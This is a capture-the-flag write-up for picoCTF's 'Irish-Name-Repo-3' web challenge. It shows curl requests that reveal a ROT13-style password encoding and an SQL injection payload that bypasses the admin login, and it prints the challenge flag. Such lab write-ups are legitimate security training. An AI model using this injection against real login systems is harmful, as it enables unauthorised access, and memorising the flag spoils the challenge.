Irish-Name-Repo-3

Point: 400

Category

Web Exploitation

Question

There is a secure website running at https://2019shell1.picoctf.com/problem/12271/ (link) or http://2019shell1.picoctf.com:12271. Try to see if you can login as admin!

Hint

Seems like the password is encrypted.

Solution

I tried to use solution like in Irish-Name-Repo 1 and Irish-Name-Repo 2 but It wasn't working.

The website offered an admin login page

<!doctype html>
<html>
<head>
    <title>Login</title>
    <link rel="stylesheet" type="text/css" href="//maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
</head>
<body>
<div class="container">
    <div class="row">
        <div class="col-md-12">
            <div class="panel panel-primary" style="margin-top:50px">
                <div class="panel-heading">
                    <h3 class="panel-title">Admin Log In</h3>
                </div>
                <div class="panel-body">
                    <form action="login.php" method="POST">
                        <fieldset>
                            <div class="form-group">

                                <label for="password">Password:</label>
                                <div class="controls">
                                    <input type="password" id="password" name="password" class="form-control">
                                </div>
                            </div>
                            <input type="hidden" name="debug" value="0">

                            <div class="form-actions">
                                <input type="submit" value="Login" class="btn btn-primary">
                            </div>
                        </fieldset>
                    </form>
                </div>
            </div>
        </div>
    </div>
</div>
</body>
</html>

Then I used the debug interface to test.

At first, I tried with password=abc with debug=1. Then I got some response with password=nop.

root@kali: curl "https://2019shell1.picoctf.com/problem/12271/login.php" --data "password=abc & debug=1"
<pre>password: abc
SQL query: SELECT * FROM admin where password = 'nop '
</pre><h1>Login failed.</h1>

As the hint, I knew password is encrypted. This might be a substitution cipher. So, I decided to try a simple injection. I changed parameter of password password=' OR 1=1--, then I got SELECT * FROM admin where password = '' be 1=1 '

root@kali: curl "https://2019shell1.picoctf.com/problem/12271/login.php" --data "password=' or 1=1--' & debug=1"
<pre>password: ' or 1=1
SQL query: SELECT * FROM admin where password = '' be 1=1 '
</pre>

Finally, I changed password=' OR 1=1-- to password=' be 1=1--. BOOM!!! => I got the flag

root@kali:  curl "https://2019shell1.picoctf.com/problem/12271/login.php" --data "password=' be 1=1-- & debug=1"
<pre>password: ' be 1=1--
SQL query: SELECT * FROM admin where password = '' or 1=1-- '
</pre><h1>Logged in!</h1><p>Your flag is: picoCTF{3v3n_m0r3_SQL_ef7eac2f}</p>

Flag

picoCTF{3v3n_m0r3_SQL_ef7eac2f}